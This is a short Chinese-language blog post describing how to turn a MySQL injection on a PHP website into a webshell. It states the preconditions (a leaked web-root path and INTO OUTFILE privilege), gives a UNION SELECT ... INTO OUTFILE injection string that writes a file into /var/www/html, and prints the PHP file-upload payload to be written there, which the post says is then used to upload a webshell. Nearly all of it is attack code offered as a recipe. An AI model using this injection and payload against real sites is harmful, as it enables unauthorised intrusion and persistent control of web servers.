分享

关于MySQL注入漏洞到获取webshell

 python_lover 2021-11-30

关于PHP网站报错性注入拿shell的方法,定位到报错在某个字段上的利用方式:

条件1: 爆出了网站的物理路径

条件2:MySQL具有into outfile权限

 

SQL语句为:

假如字段为2:

union+select+1,payload的十六进制,3,4,5+into+outfile+'/var/www/html/data/1.php';

 

payload:

<?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>

 

访问1.PHP上传webshell即可。

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约